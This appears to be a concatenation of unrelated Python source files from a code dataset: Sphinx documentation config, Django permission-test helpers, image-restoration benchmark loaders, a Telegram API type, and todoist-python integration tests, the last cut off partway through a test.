# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoTranslationsdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DjangoTranslations.tex', documentation,
author, 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'djangotranslations', documentation,
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DjangoTranslations', documentation,
author, 'DjangoTranslations', description,
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'django': ('http://django.readthedocs.org/en/latest/', None),
}
# -- Options for doctest extension -------------------------------------------
doctest_global_setup = """
import builtins
from django.db import connection
from django.test import TestCase
from sample.utils import create_samples
import beautifier
# Turn on the test database for the doctests
connection.creation.create_test_db(verbosity=0)
TestCase.setUpClass()
# Beautify `testoutput`
def print(value='', end='\\n'):
builtins.print(beautifier.beautify(value, False), end=end)
# Sample creation
def create_doc_samples(translations=True):
if translations:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
continent_fields=['name', 'denonym'],
country_fields=['name', 'denonym'],
city_fields=['name', 'denonym'],
langs=['de']
)
else:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
)
"""
doctest_global_cleanup = """
import builtins
from django.db import connection
from django.test import TestCase
# Normalize `testoutput`
def print(value='', end='\\n'):
builtins.print(value, end=end)
# Turn off the test database for the doctests
TestCase.tearDownClass()
connection.creation.destroy_test_db(verbosity=0)
"""
| 1.8125 | 2 |
skorecard/metrics/__init__.py | orchardbirds/skorecard-1 | 0 | 6894 | <reponame>orchardbirds/skorecard-1
"""Import required Metric."""
from .metrics import IV_scorer
__all__ = ["IV_scorer"]
| 0.996094 | 1 |
src/waldur_core/core/tests/helpers.py | geant-multicloud/MCMS-mastermind | 26 | 6895 | import copy
from django.conf import settings
from django.test.utils import override_settings
from rest_framework import status, test
class PermissionsTest(test.APITransactionTestCase):
"""
Abstract class for permissions tests.
Methods `get_urls_configs`, `get_users_with_permission`,
`get_users_without_permissions` have to be overridden.
Logical example:
class ExamplePermissionsTest(PermissionsTest):
def get_users_with_permission(self, url, method):
if is_unreachable(url):
                # no one has access to an unreachable url
return []
return [user_with_permission]
def get_users_without_permissions(self, url, method):
if is_unreachable(url):
                # nobody has access to an unreachable url
return [user_with_permission, user_without_permission]
return [user_without_permission]
def get_urls_configs(self):
            yield {'url': 'http://testserver/some/url', 'method': 'GET'}
yield {'url': 'http://testserver/some/unreachable/url', 'method': 'POST'}
...
"""
def get_urls_configs(self):
"""
Return list or generator of url configs.
Each url config is dictionary with such keys:
- url: url itself
- method: request method
- data: data which will be sent in request
url config example:
{
'url': 'http://testserver/api/backup/',
'method': 'POST',
'data': {'backup_source': 'backup/source/url'}
}
"""
raise NotImplementedError()
def get_users_with_permission(self, url, method):
"""
Return list of users which can access given url with given method
"""
raise NotImplementedError()
def get_users_without_permissions(self, url, method):
"""
Return list of users which can not access given url with given method
"""
raise NotImplementedError()
def test_permissions(self):
"""
        Go through all url configs and check that users with permissions
        can request them and users without permissions cannot.
"""
for conf in self.get_urls_configs():
url, method = conf['url'], conf['method']
data = conf['data'] if 'data' in conf else {}
for user in self.get_users_with_permission(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
self.assertFalse(
response.status_code
in (status.HTTP_403_FORBIDDEN, status.HTTP_404_NOT_FOUND),
'Error. User %s can not reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
for user in self.get_users_without_permissions(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
unreachable_statuses = (
status.HTTP_403_FORBIDDEN,
status.HTTP_404_NOT_FOUND,
status.HTTP_409_CONFLICT,
)
self.assertTrue(
response.status_code in unreachable_statuses,
'Error. User %s can reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
class ListPermissionsTest(test.APITransactionTestCase):
"""
    Abstract class that tests which objects a user receives in a list view.
    Method `get_users_and_expected_results` has to be overridden.
    Method `get_url` has to be defined.
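
    Logical example (illustrative only; `staff_user` and `regular_user` are
    placeholders for users created in the test setup):

        class ExampleListPermissionsTest(ListPermissionsTest):
            def get_url(self):
                return 'http://testserver/some/list/url'

            def get_users_and_expected_results(self):
                return [
                    {'user': staff_user,
                     'expected_results': [{'name': 'first'}, {'name': 'second'}]},
                    {'user': regular_user,
                     'expected_results': [{'name': 'first'}]},
                ]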
"""
def get_url(self):
return None
def get_users_and_expected_results(self):
"""
Return list or generator of dictionaries with such keys:
        - user - the user to authenticate as
        - expected_results - list of dictionaries with the fields the user
          should receive in the response
"""
pass
def test_list_permissions(self):
for user_and_expected_result in self.get_users_and_expected_results():
user = user_and_expected_result['user']
expected_results = user_and_expected_result['expected_results']
self.client.force_authenticate(user=user)
response = self.client.get(self.get_url())
self.assertEqual(
len(expected_results),
len(response.data),
'User %s receive wrong number of objects. Expected: %s, received %s'
% (user, len(expected_results), len(response.data)),
)
for actual, expected in zip(response.data, expected_results):
for key, value in expected.items():
self.assertEqual(actual[key], value)
def override_waldur_core_settings(**kwargs):
waldur_settings = copy.deepcopy(settings.WALDUR_CORE)
waldur_settings.update(kwargs)
return override_settings(WALDUR_CORE=waldur_settings)
| 2.390625 | 2 |
data/benchmark.py | Gummary/denet | 343 | 6896 | <reponame>Gummary/denet
"""
CutBlur
Copyright 2020-present NAVER corp.
MIT license
"""
import os
import glob
import data
class BenchmarkSR(data.BaseDataset):
def __init__(self, phase, opt):
root = opt.dataset_root
self.scale = opt.scale
dir_HQ, dir_LQ = self.get_subdir()
self.HQ_paths = sorted(glob.glob(os.path.join(root, dir_HQ, "*.png")))
self.LQ_paths = sorted(glob.glob(os.path.join(root, dir_LQ, "*.png")))
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HR"
dir_LQ = "X{}".format(self.scale)
return dir_HQ, dir_LQ
class BenchmarkDN(BenchmarkSR):
def __init__(self, phase, opt):
self.sigma = opt.sigma
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.sigma)
return dir_HQ, dir_LQ
class BenchmarkJPEG(BenchmarkSR):
def __init__(self, phase, opt):
self.quality = opt.quality
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.quality)
return dir_HQ, dir_LQ
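# Expected on-disk layout, inferred from the globs above (illustrative only; the
# root directory comes from opt.dataset_root):
#
#   <dataset_root>/HR/*.png            high-quality targets (BenchmarkSR)
#   <dataset_root>/X{scale}/*.png      low-resolution inputs (BenchmarkSR)
#   <dataset_root>/HQ/*.png            clean targets (BenchmarkDN, BenchmarkJPEG)
#   <dataset_root>/{sigma}/*.png       noisy inputs (BenchmarkDN)
#   <dataset_root>/{quality}/*.png     JPEG-compressed inputs (BenchmarkJPEG)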
| 2.328125 | 2 |
pytglib/api/types/update_chat_is_pinned.py | iTeam-co/pytglib | 6 | 6897 | <gh_stars>1-10
from ..utils import Object
class UpdateChatIsPinned(Object):
"""
A chat was pinned or unpinned
Attributes:
ID (:obj:`str`): ``UpdateChatIsPinned``
Args:
chat_id (:obj:`int`):
Chat identifier
is_pinned (:obj:`bool`):
New value of is_pinned
order (:obj:`int`):
New value of the chat order
Returns:
Update
Raises:
:class:`telegram.Error`
"""
ID = "updateChatIsPinned"
def __init__(self, chat_id, is_pinned, order, **kwargs):
self.chat_id = chat_id # int
self.is_pinned = is_pinned # bool
self.order = order # int
@staticmethod
def read(q: dict, *args) -> "UpdateChatIsPinned":
chat_id = q.get('chat_id')
is_pinned = q.get('is_pinned')
order = q.get('order')
return UpdateChatIsPinned(chat_id, is_pinned, order)
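# Illustrative usage (the payload shape is assumed from the attributes documented
# above, not taken from a real TDLib response):
#
#   update = UpdateChatIsPinned.read({'chat_id': 123456, 'is_pinned': True, 'order': 10})
#   # update.chat_id == 123456, update.is_pinned is True, update.order == 10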
| 2.84375 | 3 |
tests/test_api.py | jairhenrique/todoist-python | 0 | 6898 | import io
import time
import todoist
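# These tests assume pytest fixtures `api_endpoint`, `api_token`, `api_token2`,
# `cleanup` and `cleanup2` are provided elsewhere (e.g. in a conftest.py) and that
# the tokens belong to disposable test accounts: every test talks to the live Sync
# API, mutates real data and cleans up after itself with delete()/commit() calls.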
def test_stats_get(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
response = api.completed.get_stats()
assert 'days_items' in response
assert 'week_items' in response
assert 'karma_trend' in response
assert 'karma_last_update' in response
def test_user_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
date_format = api.state['user']['date_format']
date_format_new = 1 - date_format
api.user.update(date_format=date_format_new)
api.commit()
assert date_format_new == api.state['user']['date_format']
api.user.update_goals(vacation_mode=1)
api.commit()
api.user.update_goals(vacation_mode=0)
api.commit()
def test_user_settings_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
    reminder_email = not api.state['user_settings']['reminder_email']
api.user_settings.update(reminder_email=reminder_email)
api.commit()
assert reminder_email == api.state['user_settings']['reminder_email']
def test_project_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.delete()
response = api.commit()
assert response['projects'][0]['id'] == project1['id']
assert response['projects'][0]['is_deleted'] == 1
assert 'Project1' not in [p['name'] for p in api.state['projects']]
def test_project_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.update(name='UpdatedProject1')
response = api.commit()
assert response['projects'][0]['name'] == 'UpdatedProject1'
assert 'UpdatedProject1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 1
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert 1 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
api.commit()
project1.unarchive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 0
assert 0 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
project2.move(project1['id'])
response = api.commit()
assert response['projects'][0]['name'] == 'Project2'
assert response['projects'][0]['parent_id'] == project1['id']
assert project1['id'] in [
i['parent_id'] for i in api.state['projects'] if i['id'] == project2['id']
]
project2.delete()
api.commit()
project1.delete()
api.commit()
def test_project_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
api.projects.reorder(projects=[
{'id': project1['id'], 'child_order': 2},
{'id': project2['id'], 'child_order': 1},
])
response = api.commit()
for project in response['projects']:
if project['id'] == project1['id']:
assert project['child_order'] == 2
if project['id'] == project2['id']:
assert project['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project1['id']
]
assert 1 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project2['id']
]
project1.delete()
api.commit()
project2.delete()
api.commit()
def test_item_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
response = api.add_item('Item1')
assert response['content'] == 'Item1'
api.sync()
assert 'Item1' in [i['content'] for i in api.state['items']]
item1 = [i for i in api.state['items'] if i['content'] == 'Item1'][0]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.sync()
item1.delete()
response = api.commit()
assert response['items'][0]['id'] == item1['id']
assert response['items'][0]['is_deleted'] == 1
assert 'Item1' not in [i['content'] for i in api.state['items']]
def test_item_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item1.update(content='UpdatedItem1')
response = api.commit()
assert response['items'][0]['content'] == 'UpdatedItem1'
assert 'UpdatedItem1' in [i['content'] for i in api.state['items']]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 1
assert 1 in [
i['checked'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_uncomplete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.uncomplete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 0
assert 0 in [
        i['checked'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 1
assert 1 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
api.commit()
item2.unarchive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 0
assert 0 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_move_to_project(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
project1 = api.projects.add('Project1')
api.commit()
item1.move(project_id=project1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item1'
assert response['items'][0]['project_id'] == project1['id']
assert project1['id'] in [
i['project_id'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
project1.delete()
api.commit()
def test_item_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
item2.move(parent_id=item1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['parent_id'] == item1['id']
assert item1['id'] in [
i['parent_id'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_date_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'every day'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
new_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
due = {
'date': new_date_utc,
'string': 'every day',
}
api.items.update_date_complete(item1['id'], due=due)
response = api.commit()
assert response['items'][0]['due']['string'] == 'every day'
assert 'every day' in [
i['due']['string'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
def test_item_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.reorder(items=[
{'id': item1['id'], 'child_order': 2},
{'id': item2['id'], 'child_order': 1},
])
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['child_order'] == 2
if item['id'] == item2['id']:
assert item['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['items']
if p['id'] == item1['id']
]
assert 1 in [
p['child_order'] for p in api.state['items']
if p['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_day_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.update_day_orders({item1['id']: 1, item2['id']: 2})
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['day_order'] == 1
if item['id'] == item2['id']:
assert item['day_order'] == 2
assert 1 == api.state['day_orders'][str(item1['id'])]
assert 2 == api.state['day_orders'][str(item2['id'])]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_label_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
response = api.commit()
assert response['labels'][0]['name'] == 'Label1'
assert 'Label1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.delete()
response = api.commit()
assert response['labels'][0]['id'] == label1['id']
assert response['labels'][0]['is_deleted'] == 1
    assert 'Label1' not in [l['name'] for l in api.state['labels']]
def test_label_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.update(name='UpdatedLabel1')
response = api.commit()
assert response['labels'][0]['name'] == 'UpdatedLabel1'
assert 'UpdatedLabel1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label2 = api.labels.add('Label2')
api.commit()
api.labels.update_orders({label1['id']: 1, label2['id']: 2})
response = api.commit()
for label in response['labels']:
if label['id'] == label1['id']:
assert label['item_order'] == 1
if label['id'] == label2['id']:
assert label['item_order'] == 2
assert 1 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label1['id']
]
assert 2 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label2['id']
]
label1.delete()
api.commit()
label2.delete()
api.commit()
def test_note_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
response = api.commit()
assert response['notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['notes'][0]['id'] == note1['id']
assert response['notes'][0]['is_deleted'] == 1
    assert 'Note1' not in [n['content'] for n in api.state['notes']]
item1.delete()
api.commit()
def test_note_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_projectnote_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_projectnote_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['project_notes'][0]['id'] == note1['id']
assert response['project_notes'][0]['is_deleted'] == 1
    assert 'Note1' not in [
n['content'] for n in api.state['project_notes']
]
project1.delete()
api.commit()
def test_projectnote_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_filter_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
response = api.commit()
assert response['filters'][0]['name'] == 'Filter1'
assert 'Filter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.delete()
response = api.commit()
assert response['filters'][0]['id'] == filter1['id']
assert response['filters'][0]['is_deleted'] == 1
assert 'Filter1' not in [p['name'] for p in api.state['filters']]
def test_filter_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.update(name='UpdatedFilter1')
response = api.commit()
assert response['filters'][0]['name'] == 'UpdatedFilter1'
assert 'UpdatedFilter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter2 = api.filters.add('Filter2', 'today')
api.commit()
api.filters.update_orders({filter1['id']: 2, filter2['id']: 1})
response = api.commit()
for filter in response['filters']:
if filter['id'] == filter1['id']:
assert filter['item_order'] == 2
if filter['id'] == filter2['id']:
assert filter['item_order'] == 1
assert 2 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter1['id']
]
assert 1 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter2['id']
]
filter1.delete()
api.commit()
filter2.delete()
api.commit()
def test_reminder_relative_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 30
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_relative_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.delete()
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
api.commit()
def test_reminder_relative_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
    reminder1.update(minute_offset=15)
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 15
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
api.reminders.delete(reminder1['id'])
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
response = api.commit()
def test_reminder_absolute_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
tomorrow = time.gmtime(now + 24 * 3600 + 60)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
    api.reminders.update(reminder1['id'], due={'date': due_date_utc})
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_locations(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.locations.clear()
api.commit()
assert api.state['locations'] == []
def test_live_notifications(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.live_notifications.set_last_read(
api.state['live_notifications_last_read_id'])
response = api.commit()
assert response['live_notifications_last_read_id'] == \
api.state['live_notifications_last_read_id']
def test_share_accept(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
